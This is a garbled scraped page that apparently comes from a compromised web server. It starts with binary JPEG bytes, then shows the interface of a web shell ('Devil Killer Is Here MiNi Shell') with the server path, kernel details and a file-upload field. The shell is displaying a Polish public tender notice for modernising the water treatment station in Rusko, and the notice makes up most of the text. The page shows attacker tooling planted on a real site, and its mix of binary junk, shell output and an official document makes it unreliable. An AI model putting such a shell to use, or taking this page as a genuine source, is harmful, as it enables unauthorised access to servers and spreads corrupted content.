JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240711/0040842701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa retencji wody pitnej – modernizacja Stacji Uzdatniania Wody w Rusku wraz z budową instalacji odnawialnego źródła energii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JARACZEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250855363</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jarocińska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jaraczewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">62 747 31 02</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">62 747 31 02</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@jaraczewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jaraczewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa retencji wody pitnej – modernizacja Stacji Uzdatniania Wody w Rusku wraz z budową instalacji odnawialnego źródła energii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e5b60e26-6f14-4d85-b939-5bb3bb6561dc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00408427</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00021787/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Poprawa retencji wody pitnej - modernizacja Stacji Uzdatniania Wody w Rusku wraz z budową instalacji odnawialnego źródła energii</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/953745 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Środkiem komunikacji elektronicznej w niniejszym postępowaniu jest<br/>platformazakupowa.pl dostępna pod adresem internetowym https://platformazakupowa.pl/transakcja/953745</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający informuje, że instrukcje<br/>korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania<br/>ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">P-zp.271.01.09.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budynek wraz z infrastrukturą objęty projektowaną przebudową znajduje się na działce gminnej o nr <br/>ewid: działka nr 152; 153/1; obręb Rusko.<br/><br/>Przedmiotem zamówienia jest modernizacja Stacji Uzdatniania Wody w Rusku obejmująca swym <br/>zakresem, m.in:<br/><br/>- budowę dwóch zbiorników retencyjnych o pojemności 200m³ każdy wraz fundamentami oraz z niezbędnymi rurociągami międzyobiektowymi:<br/>* rurociąg wody surowej ze studni głębinowych do budynku SUW – PE100 SDR17 PN10 Dz160mm, <br/>* rurociąg wody uzdatnionej na projektowane zbiorniki retencyjne - PE100 SDR17 PN10 Dz160mm <br/>* rurociąg wody uzdatnionej kolektor ssący z projektowanych zbiorników retencyjnych - PE100 SDR17 PN10 Dz225mm <br/>* wymiana fragmentu przy budynku sieci wodociągowej wody uzdatnionej - PE100 SDR17 PN10 <br/>Dz160mm <br/>* kanalizacja spustu wody ze zbiorników retencyjnych<br/>- budowę nowego zbiornika wód popłuczyn wraz z niezbędnymi rurociągami międzyobiektowymi:<br/>* kanalizacja wód technicznych - popłuczyny ,<br/>- demontaż istniejących zbiorników wód popłucznych<br/>- budowę instalacji paneli fotowoltaicznych o mocy do 50kW o maksymalnej powierzchni do 400m2 wraz z włączeniem do sieci,<br/>- modernizację studni głębinowych,<br/>- utwardzenie terenu pod drogi dojazdowe i place manewrowe,<br/>- wykonanie nowego ogrodzenia wraz z bramą wjazdową oraz furtką, frezowanie pozostałych korzeni drzew,<br/>- dostawę oraz montaż podświetlanego napisu stacji,<br/>- dostawę urządzeń do utrzymania terenu oraz obiektu w należytym stanie sanitarnym tj. kosiarki (traktorka ogrodowego) z koszem o mocy min. 20 KM oraz szerokością koszenia min. 100 cm. oraz myjkę elektryczną wysokociśnieniową na ciepłą wodę o maks. ciśnieniu roboczym min. 140 bar.<br/><br/>Założenia (przedmiot zamówienia):<br/>Budowa instalacji paneli fotowoltaicznych wraz z włączeniem do sieci, budowę zbiorników retencyjnych na wodę wraz z fundamentami oraz włączenie ich do nowej sieci międzyobiektowej, wykonanie nowego ogrodzenia z paneli systemowych oraz frezowanie pozostałych korzeni drzew, montaż pomp głębinowych, orurowania i obudów studni, wykonanie utwardzenia placu manewrowego z wydzieleniem miejsc parkingowych, dostawa urządzeń do utrzymania w należytym stanie sanitarnym obiektu SUW oraz terenu.<br/><br/>Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, dokumentacji projektowej, szczegółowych specyfikacjach technicznych oraz pomocniczo w przedmiarze robót, stanowiących załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45252120-5 - Roboty budowlane w zakresie zakładów uzdatniania wody</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45232430-5 - Roboty w zakresie uzdatniania wody</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) – waga kryterium 60,00%;<br/>2) Gwarancja na wykonane roboty (G) – waga kryterium 40%.<br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>Nr kryterium	Wzór<br/>1	C= (Cmin/Cof) * 100 * waga<br/>gdzie:<br/>- Cmin - najniższa cena ofertowa brutto spośród wszystkich ofert niepodlegających odrzuceniu<br/>- Cof - cena podana w ofercie (brutto)<br/>- C – punkty badanej oferty<br/>2	G=(Gof/Gmax) * 100 * waga<br/>gdzie:<br/>- Gof – okres gwarancji proponowany w ocenianej ofercie, nie dłuższy niż 60 miesięcy; <br/>- Gmax – najdłuższy okres gwarancji proponowany w ocenianych ofertach, nie dłuższy niż 60 miesięcy<br/>- G - punkty badanej oferty.<br/><br/>UWAGA: Minimalny okres gwarancji wymagany przez zamawiającego nie może być krótszy niż 36 miesięcy (obowiązuje wszystkich wykonawców). Zamawiający odrzuci oferty Wykonawców, którzy w Formularzu oferty wskazali okres gwarancji poniżej 36 miesięcy. Przy okresie gwarancji dłuższym niż 60 miesięcy, dla celów punktacji w przedmiotowym kryterium zostanie przyjęta wartość 60 miesięcy.<br/>Okres gwarancji powinien zostać podany w miesiącach. Jeśli okres gwarancji zostanie podany w latach – Zamawiający przeliczy podany okres na odpowiednią liczbę miesięcy (1 rok=12 miesięcy).<br/>2.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na wartość co najmniej 1 500 000,00 złotych (Słownie: jeden milion pięćset tysięcy złotych 00/100).<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego sytuacji ekonomicznej lub finansowej, uzna niniejszy warunek za spełniony, jeżeli każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na wartość co najmniej 1 500 000,00 złotych (Słownie: jeden milion pięćset tysięcy złotych 00/100)<br/>4)	zdolności technicznej lub zawodowej:<br/>a)	warunek dotyczący doświadczenia Wykonawcy:<br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>- posiada doświadczenie, tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę budowlaną o podobnym charakterze i złożoności, w zakresie niezbędnym do wykazania spełniania przedmiotowego warunku, tj. polegającą na budowie/ modernizacji/ przebudowie stacji uzdatniania wody lub oczyszczalni ścieków o wartości nie mniejszej niż 2 000 000,00 zł brutto (słownie: dwa miliony złotych 00/100). <br/>b)	warunek dotyczący osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował podczas realizacji przedmiotu zamówienia następującymi osobami:<br/>-	dysponuje co najmniej: osobami skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnymi za kierowanie robotami budowlanymi w specjalnościach:<br/>a)	w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz - co najmniej pięć lat doświadczenia zawodowego na stanowisku kierownika budowy, <br/>b)	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, - co najmniej trzy lata doświadczenia zawodowego na stanowisku kierownika robót sanitarnych, w tym pełnienie funkcji kierownika robót przy budowie, modernizacji lub przebudowie co najmniej jednego obiektu stacji uzdatniania wody<br/>c)	w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń - co najmniej trzy lata doświadczenia zawodowego na stanowisku kierownika robót elektrycznych.<br/>Uwaga:<br/>Kierownik budowy oraz kierownicy robót powinni posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (t.j. Dz.U. z 2023r., poz. 682 ze zm.) oraz rozporządzeniem Ministra Inwestycji i Rozwoju z 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019r., poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2023r., poz. 334 ze zm.). <br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, o którym mowa w pkt 2.4) lit. a) niniejszego rozdziału SWZ, uzna niniejszy warunek za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną robotę budowlaną o podobnym charakterze i złożoności, w zakresie niezbędnym do wykazania spełniania przedmiotowego warunku, tj. polegającą na budowie/ modernizacji/ przebudowie stacji uzdatniania wody lub oczyszczalni ścieków o wartości nie mniejszej niż 2 000 000,00 zł brutto (słownie: dwa miliony złotych 00/100).<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, o którym mowa w pkt 2.4) lit. b) niniejszego rozdziału SWZ, uzna niniejszy warunek za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie dysponował co najmniej: osobami skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnymi za kierowanie robotami budowlanymi w specjalnościach:<br/>a)	w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz - co najmniej pięć lat doświadczenia zawodowego na stanowisku kierownika budowy, <br/>b)	w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, - co najmniej trzy lata doświadczenia zawodowego na stanowisku kierownika robót sanitarnych, w tym pełnienie funkcji kierownika robót przy budowie, modernizacji lub przebudowie co najmniej jednego obiektu stacji uzdatniania wody<br/>c)	w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń - co najmniej trzy lata doświadczenia zawodowego na stanowisku kierownika robót elektrycznych.<br/>W odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, o którym mowa w pkt 2.4) lit. a) i b) niniejszego rozdziału SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>b)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia przez Wykonawcę spełnienia warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający będzie żądał dostarczenia następujących dokumentów:<br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - według wzoru stanowiącego załącznik nr 5 do SWZ;<br/>b)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - w formie załącznika nr 6 do SWZ<br/>c)	dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez 